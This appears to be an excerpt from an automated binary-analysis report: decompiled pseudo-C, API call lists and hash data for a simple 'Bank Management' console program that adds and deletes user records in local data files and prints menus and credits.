                                                					if(_t54 == 0x59) {
                                                						L10:
                                                						 *0x1252f28 = E01236EF1("USER.DAT", "r");
                                                						_t56 = E01236EF1("temp.dat", "a");
                                                						_t127 = _t125 + 0x10;
                                                						 *0x1252f20 = _t56;
                                                						while(1) {
                                                							_push( &_v116);
                                                							_push( &_v84);
                                                							_t93 =  *0x1252f28; // 0x0
                                                							_t58 = E01237021(_t93, "%s %s %s\n", 0x1252ee0);
                                                							_t128 = _t127 + 0x14;
                                                							__eflags = _t58 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							_t79 = E01238230(0x1252ee4,  &_v84);
                                                							_t139 = _t128 + 8;
                                                							__eflags = _t79;
                                                							if(__eflags != 0) {
                                                								L14:
                                                								_push( &_v116);
                                                								_push( &_v84);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t80 =  *0x1252f20; // 0x0
                                                								_push(_t80);
                                                								E01236F06(_t89, _t116, _t117, __eflags);
                                                								_t127 = _t139 + 0x14;
                                                								L15:
                                                								continue;
                                                							}
                                                							_t83 = E01238230(0x1252f02,  &_v116);
                                                							_t127 = _t139 + 8;
                                                							__eflags = _t83;
                                                							if(__eflags == 0) {
                                                								goto L15;
                                                							}
                                                							goto L14;
                                                						}
                                                						_t94 =  *0x1252f28; // 0x0
                                                						_push(_t94);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						_t107 =  *0x1252f20; // 0x0
                                                						_push(_t107);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						 *0x1252f28 = E01236EF1("LOG.DAT", "r");
                                                						_t62 = E01236EF1("temp.dat", "w");
                                                						_t132 = _t128 + 0x18;
                                                						 *0x1252f20 = _t62;
                                                						while(1) {
                                                							_push( &_v129);
                                                							_push( &_v139);
                                                							_push( &_v154);
                                                							_t96 =  *0x1252f28; // 0x0
                                                							_t65 = E01237021(_t96, "%s %s %s %s",  &_v188);
                                                							_t133 = _t132 + 0x18;
                                                							__eflags = _t65 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							E01247CF2( &_v188);
                                                							E01247CF2( &_v20);
                                                							_t75 = E01238230( &_v188,  &_v20);
                                                							_t132 = _t133 + 0x10;
                                                							__eflags = _t75;
                                                							if(__eflags != 0) {
                                                								_push( &_v129);
                                                								_push( &_v139);
                                                								_push( &_v154);
                                                								_push( &_v188);
                                                								_push("%s %s %s %s\n");
                                                								_t99 =  *0x1252f20; // 0x0
                                                								_push(_t99);
                                                								E01236F06(_t89, _t116, _t117, __eflags);
                                                								_t132 = _t132 + 0x18;
                                                							}
                                                						}
                                                						_t109 =  *0x1252f28; // 0x0
                                                						_push(_t109);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						_t67 =  *0x1252f20; // 0x0
                                                						_push(_t67);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						E012320E0(_t96, _t116, _t117, __eflags, _t146);
                                                						E012312B0(0x19, 0xa);
                                                						_push("Record DELETED successfully!");
                                                						return E0123715C(_t89, _t116, _t117, __eflags);
                                                					}
                                                					__eflags = _v5 - 0x79;
                                                					if(_v5 != 0x79) {
                                                						return _t54;
                                                					}
                                                					goto L10;
                                                				}
                                                				E012312B0(0xa, 0xa);
                                                				_push(0x124f4fc);
                                                				return E0123715C(_t89, _t116, _t117, __eflags);
                                                			}























































                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232841
                                                • _wscanf.LIBCMT ref: 01232853
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232869
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 012328AA
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 01232914
                                                • _wprintf.LIBCMT ref: 0123292F
                                                • _swscanf.LIBCMT ref: 01232994
                                                • _fprintf.LIBCMT ref: 012329E3
                                                • _swscanf.LIBCMT ref: 01232A5E
                                                • _fprintf.LIBCMT ref: 01232AC2
                                                • _wprintf.LIBCMT ref: 01232AFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
                                                • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
                                                • API String ID: 3163849712-4002591224
                                                • Opcode ID: 8f68f0044d92cee46a3857197f934cba047f56bb2c8d8ece20c0c8ecc6e3979f
                                                • Instruction ID: 076d58e85ca01c1a6b5067cfb64ac55c1ffb54fb449b3a7240fb921a9c9eedcb
                                                • Opcode Fuzzy Hash: 8f68f0044d92cee46a3857197f934cba047f56bb2c8d8ece20c0c8ecc6e3979f
                                                • Instruction Fuzzy Hash: C071CBF2D30306EBDB15EBE4ED82EBE72786BE5700F04411DE905A5184FA71E25887B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E012325C0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v8;
                                                				char _v12;
                                                				char _v15;
                                                				char _v19;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v44;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v71;
                                                				char _v75;
                                                				char _v76;
                                                				char _v108;
                                                				char _v140;
                                                				void* __ebp;
                                                				intOrPtr _t42;
                                                				void* _t44;
                                                				intOrPtr _t53;
                                                				intOrPtr _t58;
                                                				intOrPtr _t67;
                                                				void* _t70;
                                                				void* _t73;
                                                				intOrPtr _t75;
                                                				intOrPtr _t76;
                                                				intOrPtr _t79;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t85;
                                                				void* _t88;
                                                				void* _t89;
                                                				void* _t90;
                                                				void* _t103;
                                                
                                                				_t103 = __fp0;
                                                				_t84 = __esi;
                                                				_t83 = __edi;
                                                				_t73 = __ebx;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_v76 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v44 = 0;
                                                				_t74 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v19 = 0;
                                                				_v15 = 0;
                                                				do {
                                                					E012320E0(_t74, _t83, _t84, 0, _t103);
                                                					_v8 = 0;
                                                					E012312B0(0x19, 8);
                                                					_push("User Name        : ");
                                                					E0123715C(_t73, _t83, _t84, 0);
                                                					E0123738B("%s", 0x1252ee4);
                                                					_t42 = E01236EF1("USER.DAT", "r");
                                                					_t88 = _t85 + 0x14;
                                                					 *0x1252f28 = _t42;
                                                					_v12 = 0;
                                                					while(1) {
                                                						_push( &_v140);
                                                						_push( &_v108);
                                                						_t75 =  *0x1252f28; // 0x0
                                                						_t44 = E01237021(_t75, "%s %s %s\n", 0x1252ee0);
                                                						_t89 = _t88 + 0x14;
                                                						if(_t44 == 0xffffffff) {
                                                							goto L6;
                                                						}
                                                						_t70 = E01238230( &_v108, 0x1252ee4);
                                                						_t88 = _t89 + 8;
                                                						if(_t70 == 0) {
                                                							_v12 = _v12 + 1;
                                                						}
                                                					}
                                                					L6:
                                                					_t74 =  *0x1252f28; // 0x0
                                                					_push(_t74);
                                                					E01236DB6(_t73, _t83, _t84, __eflags);
                                                					_t90 = _t89 + 4;
                                                					__eflags = _v12;
                                                					if(__eflags == 0) {
                                                						E012312B0(0x19, 0xa);
                                                						_push("Password         : ");
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						E012312F0(_t83, _t84,  &_v76);
                                                						E012312B0(0x19, 0xc);
                                                						_push("Confirm Password : ");
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						_t74 =  &_v44;
                                                						E012312F0(_t83, _t84,  &_v44);
                                                						_t53 = E01238230(0x1252f02,  &_v44);
                                                						_t85 = _t90 + 0x10;
                                                						__eflags = _t53;
                                                						if(__eflags != 0) {
                                                							E012320E0( &_v44, _t83, _t84, __eflags, _t103);
                                                							E012312B0(0xa, 0xa);
                                                							_push(0x124f444);
                                                							E0123715C(_t73, _t83, _t84, __eflags);
                                                							_t85 = _t85 + 4;
                                                							_t67 = _v8 + 1;
                                                							__eflags = _t67;
                                                							_v8 = _t67;
                                                						}
                                                					} else {
                                                						E012312B0(0xa, 0xa);
                                                						_push(0x124f3e0);
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						_t85 = _t90 + 4;
                                                						_v8 = _v8 + 1;
                                                					}
                                                					__eflags = _v8;
                                                				} while (__eflags != 0);
                                                				 *0x1252f28 = E01236EF1("USER.DAT", 0x124f474);
                                                				_t76 =  *0x1252f28; // 0x0
                                                				_push(_t76);
                                                				E01236DB6(_t73, _t83, _t84, __eflags);
                                                				 *0x1252f28 = E01236EF1("USER.DAT", "a");
                                                				_push(0x1252f02);
                                                				_push(0x1252ee4);
                                                				_push(0x1252ee0);
                                                				_push("%s %s %s\n");
                                                				_t79 =  *0x1252f28; // 0x0
                                                				_push(_t79);
                                                				E01236F06(_t73, _t83, _t84, __eflags);
                                                				_t58 =  *0x1252f28; // 0x0
                                                				_push(_t58);
                                                				E01236DB6(_t73, _t83, _t84, __eflags);
                                                				E012320E0(_t76, _t83, _t84, __eflags, _t103);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Record ADDED successfully!");
                                                				return E0123715C(_t73, _t83, _t84, __eflags);
                                                			}


                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 0123262D
                                                • _wscanf.LIBCMT ref: 0123263F
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01232681
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 012326D1
                                                • _wprintf.LIBCMT ref: 012326F2
                                                • _wprintf.LIBCMT ref: 01232711
                                                • _wprintf.LIBCMT ref: 0123274A
                                                • _fprintf.LIBCMT ref: 012327BD
                                                • _wprintf.LIBCMT ref: 012327E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
                                                • String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
                                                • API String ID: 3917209068-3252730458
                                                • Opcode ID: 610a211e7216a3f412340d693cf4ca47ff4aa6f30c8cf96b8b88b39b9e9796fc
                                                • Instruction ID: bdb29ec0656845abf92865ede578f01533887ee038f045a38b4cf734633c5e7a
                                                • Opcode Fuzzy Hash: 610a211e7216a3f412340d693cf4ca47ff4aa6f30c8cf96b8b88b39b9e9796fc
                                                • Instruction Fuzzy Hash: 5E51ABF1D70305FFDB14EFA8ED42BED7AB46FA5704F04402DE504B6280EAB092589766
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E012321E0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr _v8;
                                                				void* __ebp;
                                                				void* _t28;
                                                				intOrPtr _t31;
                                                				void* _t34;
                                                				void* _t35;
                                                				void* _t36;
                                                
                                                				_t33 = __esi;
                                                				_t32 = __edi;
                                                				E01231380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                				E012312B0(0x1b, 4);
                                                				_push("BANK MANAGEMENT //");
                                                				E0123715C(_t28, __edi, __esi, __eflags);
                                                				_t35 = _t34 + 4;
                                                				E012312B0(0x19, 5);
                                                				_v8 = 0;
                                                				while(1) {
                                                					_t42 = _v8 - 0x1b;
                                                					if(_v8 >= 0x1b) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t28, _t32, _t33, _t42);
                                                					_t35 = _t35 + 8;
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E012312B0(0x19, 8);
                                                				_push("Designed and Programmed by:");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				_t36 = _t35 + 4;
                                                				E012312B0(0x19, 9);
                                                				_v8 = 0;
                                                				while(1) {
                                                					__eflags = _v8 - 0x1b;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t28, _t32, _t33, __eflags);
                                                					_t36 = _t36 + 8;
                                                					_t31 = _v8 + 1;
                                                					__eflags = _t31;
                                                					_v8 = _t31;
                                                				}
                                                				E012312B0(0x21, 0xb);
                                                				_push("Ravi Agrawal");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x21, 0xd);
                                                				_push("Sagar Sharma");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x21, 0xf);
                                                				_push("Sawal Maskey");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x18, 0x14);
                                                				_push("Press Any key to continue...");
                                                				return E0123715C(_t28, _t32, _t33, __eflags);
                                                			}


                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012321FF
                                                • _wprintf.LIBCMT ref: 01232232
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 0123224A
                                                • _wprintf.LIBCMT ref: 0123227D
                                                • _wprintf.LIBCMT ref: 01232295
                                                • _wprintf.LIBCMT ref: 012322AB
                                                • _wprintf.LIBCMT ref: 012322C1
                                                • _wprintf.LIBCMT ref: 012322D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
                                                • API String ID: 1778593935-2888666035
                                                • Opcode ID: bb80b41af1ac69cd044a5e3b3c2153553a73aab9ca4655b38ba03c0bbdfde7d0
                                                • Instruction ID: 31672184893a7d4b51700bf9b68a38bed7aafc7c2a576a83b6f59c93706bf5af
                                                • Opcode Fuzzy Hash: bb80b41af1ac69cd044a5e3b3c2153553a73aab9ca4655b38ba03c0bbdfde7d0
                                                • Instruction Fuzzy Hash: 2A217FF1BB4316B6FB157BE85D03FBD31605BE1B54F014124BA41392C1E9F1261852A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 66%
                                                			E012320E0(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				intOrPtr _v8;
                                                				void* __ebp;
                                                				void* _t9;
                                                				intOrPtr _t16;
                                                				void* _t20;
                                                				void* _t24;
                                                				void* _t26;
                                                				void* _t27;
                                                				void* _t31;
                                                				void* _t37;
                                                
                                                				_t37 = __fp0;
                                                				_t23 = __esi;
                                                				_t22 = __edi;
                                                				E01231380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                				E012312B0(0x19, 1);
                                                				_push("Banking Management //");
                                                				E0123715C(_t20, __edi, __esi, __eflags);
                                                				E012312B0(5, 3);
                                                				_t9 = E01238230(0x1252ee4, "Admin");
                                                				_t26 = _t24 + 0xc;
                                                				if(_t9 == 0) {
                                                					 *0x1252240 = 1;
                                                				}
                                                				_t34 =  *0x1252240;
                                                				if( *0x1252240 == 0) {
                                                					_push(0x1252ee4);
                                                					_push("Current User : %s");
                                                					E0123715C(_t20, _t22, _t23, __eflags);
                                                					_t27 = _t26 + 8;
                                                				} else {
                                                					_push("Current User : Admin");
                                                					E0123715C(_t20, _t22, _t23, _t34);
                                                					_t27 = _t26 + 4;
                                                				}
                                                				_push("\t\t\t\tDate : ");
                                                				E0123715C(_t20, _t22, _t23, _t34);
                                                				E0123834B(_t34, 0x1252f40);
                                                				_push(0x1252f40);
                                                				E012316A0(_t22, _t23, _t37);
                                                				_push(0x1252f40);
                                                				_push("%s");
                                                				E0123715C(_t20, _t22, _t23, _t34);
                                                				E0123834B(_t34, 0x1252f40);
                                                				_t31 = _t27 + 0x14;
                                                				_t16 = E012312B0(1, 5);
                                                				_v8 = 0;
                                                				while(1) {
                                                					_t35 = _v8 - 0x4e;
                                                					if(_v8 >= 0x4e) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t20, _t22, _t23, _t35);
                                                					_t31 = _t31 + 8;
                                                					_t16 = _v8 + 1;
                                                					_v8 = _t16;
                                                				}
                                                				return _t16;
                                                			}














                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012320FF
                                                • _wprintf.LIBCMT ref: 0123213E
                                                • _wprintf.LIBCMT ref: 01232152
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 0123215F
                                                • __wstrtime.LIBCMT ref: 0123216C
                                                • _wprintf.LIBCMT ref: 01232188
                                                • __wstrtime.LIBCMT ref: 01232195
                                                • _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
                                                • API String ID: 3817360410-644830535
                                                • Opcode ID: 684903d57c73315166edaf968c06c9a40e277e63f0ba1112a7cc0e2fed92f2c4
                                                • Instruction ID: aa7eb6eefecd4d31fd9186674e220e13b62dc7552f68dff6d8c843a5bed3c135
                                                • Opcode Fuzzy Hash: 684903d57c73315166edaf968c06c9a40e277e63f0ba1112a7cc0e2fed92f2c4
                                                • Instruction Fuzzy Hash: ED119EF1BF4303F6E7947BA26D43F6931505BA0B15F040168FF84392C1E5F1661801AB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0123A5E2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int _t81;
                                                				void* _t86;
                                                				long _t90;
                                                				signed int _t94;
                                                				signed int _t98;
                                                				signed int _t99;
                                                				signed char _t103;
                                                				signed int _t105;
                                                				intOrPtr _t106;
                                                				intOrPtr* _t109;
                                                				signed char _t111;
                                                				long _t119;
                                                				signed int _t130;
                                                				signed int _t134;
                                                				signed int _t135;
                                                				signed int _t138;
                                                				void** _t139;
                                                				signed int _t141;
                                                				void* _t142;
                                                				signed int _t143;
                                                				void** _t147;
                                                				signed int _t149;
                                                				void* _t150;
                                                				signed int _t154;
                                                				void* _t155;
                                                				void* _t160;
                                                
                                                				_push(0x64);
                                                				_push(0x124d8c0);
                                                				E01239160(__ebx, __edi, __esi);
                                                				E0123BE5F(0xb);
                                                				_t130 = 0;
                                                				 *(_t155 - 4) = 0;
                                                				_t160 =  *0x1252f60 - _t130; // 0x0
                                                				if(_t160 == 0) {
                                                					_push(0x40);
                                                					_t141 = 0x20;
                                                					_push(_t141);
                                                					_t81 = E0123C55B();
                                                					_t134 = _t81;
                                                					 *(_t155 - 0x24) = _t134;
                                                					__eflags = _t134;
                                                					if(_t134 != 0) {
                                                						 *0x1252f60 = _t81;
                                                						 *0x1252f5c = _t141;
                                                						while(1) {
                                                							__eflags = _t134 - _t81 + 0x800;
                                                							if(_t134 >= _t81 + 0x800) {
                                                								break;
                                                							}
                                                							 *((short*)(_t134 + 4)) = 0xa00;
                                                							 *_t134 =  *_t134 | 0xffffffff;
                                                							 *(_t134 + 8) = _t130;
                                                							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
                                                							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
                                                							 *((short*)(_t134 + 0x25)) = 0xa0a;
                                                							 *(_t134 + 0x38) = _t130;
                                                							 *(_t134 + 0x34) = _t130;
                                                							_t134 = _t134 + 0x40;
                                                							 *(_t155 - 0x24) = _t134;
                                                							_t81 =  *0x1252f60; // 0x0
                                                						}
                                                						GetStartupInfoW(_t155 - 0x74);
                                                						__eflags =  *((short*)(_t155 - 0x42));
                                                						if( *((short*)(_t155 - 0x42)) == 0) {
                                                							while(1) {
                                                								L31:
                                                								 *(_t155 - 0x2c) = _t130;
                                                								__eflags = _t130 - 3;
                                                								if(_t130 >= 3) {
                                                									break;
                                                								}
                                                								_t147 = (_t130 << 6) +  *0x1252f60;
                                                								 *(_t155 - 0x24) = _t147;
                                                								__eflags =  *_t147 - 0xffffffff;
                                                								if( *_t147 == 0xffffffff) {
                                                									L35:
                                                									_t147[1] = 0x81;
                                                									__eflags = _t130;
                                                									if(_t130 != 0) {
                                                										_t66 = _t130 - 1; // -1
                                                										asm("sbb eax, eax");
                                                										_t90 =  ~_t66 + 0xfffffff5;
                                                										__eflags = _t90;
                                                									} else {
                                                										_t90 = 0xfffffff6;
                                                									}
                                                									_t142 = GetStdHandle(_t90);
                                                									__eflags = _t142 - 0xffffffff;
                                                									if(_t142 == 0xffffffff) {
                                                										L47:
                                                										_t147[1] = _t147[1] | 0x00000040;
                                                										 *_t147 = 0xfffffffe;
                                                										_t94 =  *0x1253064;
                                                										__eflags = _t94;
                                                										if(_t94 != 0) {
                                                											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                                										}
                                                										goto L49;
                                                									} else {
                                                										__eflags = _t142;
                                                										if(_t142 == 0) {
                                                											goto L47;
                                                										}
                                                										_t98 = GetFileType(_t142);
                                                										__eflags = _t98;
                                                										if(_t98 == 0) {
                                                											goto L47;
                                                										}
                                                										 *_t147 = _t142;
                                                										_t99 = _t98 & 0x000000ff;
                                                										__eflags = _t99 - 2;
                                                										if(_t99 != 2) {
                                                											__eflags = _t99 - 3;
                                                											if(_t99 != 3) {
                                                												L46:
                                                												_t70 =  &(_t147[3]); // -19214164
                                                												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                                												_t147[2] = _t147[2] + 1;
                                                												L49:
                                                												_t130 = _t130 + 1;
                                                												continue;
                                                											}
                                                											_t103 = _t147[1] | 0x00000008;
                                                											__eflags = _t103;
                                                											L45:
                                                											_t147[1] = _t103;
                                                											goto L46;
                                                										}
                                                										_t103 = _t147[1] | 0x00000040;
                                                										goto L45;
                                                									}
                                                								}
                                                								__eflags =  *_t147 - 0xfffffffe;
                                                								if( *_t147 == 0xfffffffe) {
                                                									goto L35;
                                                								}
                                                								_t147[1] = _t147[1] | 0x00000080;
                                                								goto L49;
                                                							}
                                                							 *(_t155 - 4) = 0xfffffffe;
                                                							E0123A8A6();
                                                							L2:
                                                							_t86 = 1;
                                                							L3:
                                                							return E012391A5(_t86);
                                                						}
                                                						_t105 =  *(_t155 - 0x40);
                                                						__eflags = _t105;
                                                						if(_t105 == 0) {
                                                							goto L31;
                                                						}
                                                						_t135 =  *_t105;
                                                						 *(_t155 - 0x1c) = _t135;
                                                						_t106 = _t105 + 4;
                                                						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                						 *(_t155 - 0x20) = _t106 + _t135;
                                                						__eflags = _t135 - 0x800;
                                                						if(_t135 >= 0x800) {
                                                							_t135 = 0x800;
                                                							 *(_t155 - 0x1c) = 0x800;
                                                						}
                                                						_t149 = 1;
                                                						__eflags = 1;
                                                						 *(_t155 - 0x30) = 1;
                                                						while(1) {
                                                							__eflags =  *0x1252f5c - _t135; // 0x0
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t138 = E0123C55B(_t141, 0x40);
                                                							 *(_t155 - 0x24) = _t138;
                                                							__eflags = _t138;
                                                							if(_t138 != 0) {
                                                								0x1252f60[_t149] = _t138;
                                                								 *0x1252f5c =  *0x1252f5c + _t141;
                                                								__eflags =  *0x1252f5c;
                                                								while(1) {
                                                									__eflags = _t138 - 0x1252f60[_t149] + 0x800;
                                                									if(_t138 >= 0x1252f60[_t149] + 0x800) {
                                                										break;
                                                									}
